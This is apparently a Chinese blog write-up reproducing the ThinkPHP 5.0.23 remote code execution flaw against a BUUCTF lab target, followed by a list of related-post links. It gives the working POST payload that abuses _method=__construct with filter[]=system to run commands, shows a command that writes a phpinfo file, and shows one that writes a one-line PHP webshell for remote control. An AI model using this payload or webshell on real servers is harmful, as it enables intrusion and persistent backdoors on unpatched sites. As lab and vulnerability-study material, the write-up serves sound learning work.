Thinkphp5.0.23 rce(远程代码执行)的漏洞复现

漏洞形成原因

框架介绍:

ThinkPHP是一款运用极广的PHP开发框架。

漏洞引入:

其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd为系统执行命令可进行一系列操作。

靶场ip:http://node4.buuoj.cn:28700/

添加url后缀index.php?s=captcha

构造方法_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

这里我们可以用hackebar或者bp抓包修改

我用的是maxhackbar

后面就可以修改id来进行操作

Id改为

echo "<?php phpinfo(); ?>" > info.php

http://node4.buuoj.cn:28700/info.php

Info中有

或者尝试写入一句话

进行连接蚁剑

echo '<?php eval($_POST[aaa]); ?>' > shell.php

thinkphp5.0.23相关推荐

  1. php post 漏洞_ThinkPHP5 5.0.23 远程代码执行漏洞

    作者介绍:Ice 国科学院安全学员,在国科学习安全课程,也参与在国科学生会安全团队中进行安全实战能力的提升.本次分享主要是针对现在一款运用极广的开发框架ThinkPHP的远程代码执行漏洞研究,希望给大 ...

  2. thinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞

     漏洞描述 ThinkPHP是一款运用极广的PHP开发框架.其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程 ...

  3. thinkphp v5.0.11漏洞_ThinkPHP(5.1.x ~ 5.1.31 5.0.x ~ 5.0.23)GetShell漏洞

    12月9日,thinkPHP5.*发布了安全更新,这次更新修复了一处严重级别的漏洞,该漏洞可导致(php/系统)代码执行,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的ge ...

  4. thinkphp5.0.22漏洞利用

    一.搭建环境 phpstudy的版本大于5.0 解压源码到www下 浏览器访问 127.0.0.1/thinkphp/public/index.php 漏洞利用 ?s=.|think\config/g ...

  5. ThinkPHP5.0中Redis的使用和封装(原创)

    Redis是一种常用的非关系型数据库,主要用作数据缓存,数据保存形式为key-value,键值相互映射.它的数据存储跟MySQL不同,它数据存储在内存之中,所以数据读取相对而言很快,用来做高并发非常不 ...

  6. php104.tmp,ThinkPHP5.0多个文件上传后找不到临时文件的修改方法

    这是修改之前的代码 if(!empty($_FILES)){ if(!empty($_FILES[org_positive])){ $org_positive = request()->file ...

  7. ThinkPHP5.0中Redis的使用和封装

    2019独角兽企业重金招聘Python工程师标准>>> Redis是一种常用的非关系型数据库,主要用作数据缓存,数据保存形式为key-value,键值相互映射.它的数据存储跟MySQ ...

  8. mysql超详细教程_MySQL8.0.23安装超详细教程

    前言 最近在做一个人脸识别的项目,需要用数据库保存学生信息与前段交互. MySQL的优点 1.mysql性能卓越,服务稳定,很少出现异常宕机. 2.mysql开放源代码且无版权制约,自主性及使用成本低 ...

  9. thinkphp5.0.9预处理导致的sql注入复现与详细分析

    复现 先搭建thinkphp5.0.9环境 配置下测试环境 然后访问 http://tptest.cc/index.php/index/index/getage?names[0,updatexml(0 ...

最新文章

  1. 如果需要,npm检查并更新包
  2. python小项目实例流程-推荐三个最适合零基础小白练手的python项目,分享给你!...
  3. 在js对象上绑定js数组原生方法
  4. JavaScript中HTML的DOM
  5. 两数之和 python_同一屏幕播放两个视频 视频左右两个画面或视频上下两个画面如何制作...
  6. Matrix(二维hash)
  7. sql语句按月份统计查询
  8. -Head First Design Pattern- 大师与门徒(3) -Favor Composition over Inheritance
  9. 搞 Python 的程序员,不懂这一点,耽误自己成长!现在看还来得及
  10. (风中奇缘) Pocahontas
  11. mysql语句优化 explai_mysql使用explain优化sql语句
  12. redis连接数据库进行操作
  13. C++1.1 #include<iostream>
  14. 毕设-基于SSM仓库管理系统
  15. IDEA2019安装教程
  16. 433M、2.4G无线模块
  17. Warning: [antdv: LocaleProvider] `LocaleProvider` is deprecated. Please use `local
  18. 港中文深圳校区计算机研究生怎么样,香港中文大学(深圳)大概相当于国内什么水平高校...
  19. PLC常用标志位信号时序编程注意事项
  20. 金蝶云星空和小满OKKICRM单据接口对接

热门文章

  1. Highcharts中x轴为时间时的设置
  2. 2019.10 全世界评分最高动画TOP100
  3. 苹果证书 pp文件 appid
  4. java代码将csv格式的文件导入数据库
  5. 复数除法推导与C#实现
  6. html设置一条横线在标题的两侧,css实现标题左右横线
  7. python 摄像头录视频_Python实现树莓派摄像头持续录像并传送到主机
  8. 图像编辑之对比度调整(亮度对比度的算法公式)
  9. 微信的拍一拍和钉钉的钉一下
  10. DIY 首页可视化编辑